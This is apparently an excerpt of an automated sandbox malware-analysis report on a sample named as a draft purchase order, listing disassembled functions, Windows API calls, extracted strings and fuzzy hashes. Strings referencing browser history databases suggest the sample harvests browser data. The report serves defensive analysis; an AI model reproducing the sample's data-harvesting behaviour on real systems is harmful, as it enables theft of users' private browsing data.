                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                APIs
                                                                                Strings
                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                • API String ID: 2221118986-1725073988
                                                                                • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@DeleteObject
                                                                                • String ID: r!A
                                                                                • API String ID: 1103273653-628097481
                                                                                • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                APIs
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$memcmp
                                                                                • String ID: $$8
                                                                                • API String ID: 2808797137-435121686
                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                Strings
                                                                                • duplicate column name: %s, xrefs: 004307FE
                                                                                • too many columns on %s, xrefs: 00430763
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: duplicate column name: %s$too many columns on %s
                                                                                • API String ID: 0-1445880494
                                                                                • Opcode ID: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                                                • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                • Opcode Fuzzy Hash: 93b9582cf047c94b57d064edc5564507e5ded9912264045a732c21487ec891bf
                                                                                • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                APIs
                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                • String ID:
                                                                                • API String ID: 1979745280-0
                                                                                • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                APIs
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                • memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                • String ID: history.dat$places.sqlite
                                                                                • API String ID: 2641622041-467022611
                                                                                • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                APIs
                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 839530781-0
                                                                                • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: *.*$index.dat
                                                                                • API String ID: 1974802433-2863569691
                                                                                • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                • String ID:
                                                                                • API String ID: 1125800050-0
                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleSleep
                                                                                • String ID: }A
                                                                                • API String ID: 252777609-2138825249
                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                APIs
                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                • free.MSVCRT ref: 00409A31
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: freemallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3056473165-0
                                                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                APIs
                                                                                Strings
                                                                                • failed memory resize %u to %u bytes, xrefs: 00415358
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: realloc
                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                • API String ID: 471065373-2134078882
                                                                                • Opcode ID: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                                                                • Instruction ID: fa0be88ae63bf8e7a0ec1cbb838f3bc130d20eb0a75070b99cf9e4f37552e13a
                                                                                • Opcode Fuzzy Hash: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                                                                • Instruction Fuzzy Hash: 6EF05CB3A01705E7D2109A55DC418CBF3DCDFC0755B06082FF998D3201E168E88083B6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: d
                                                                                • API String ID: 0-2564639436
                                                                                • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: BINARY
                                                                                • API String ID: 2221118986-907554435
                                                                                • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
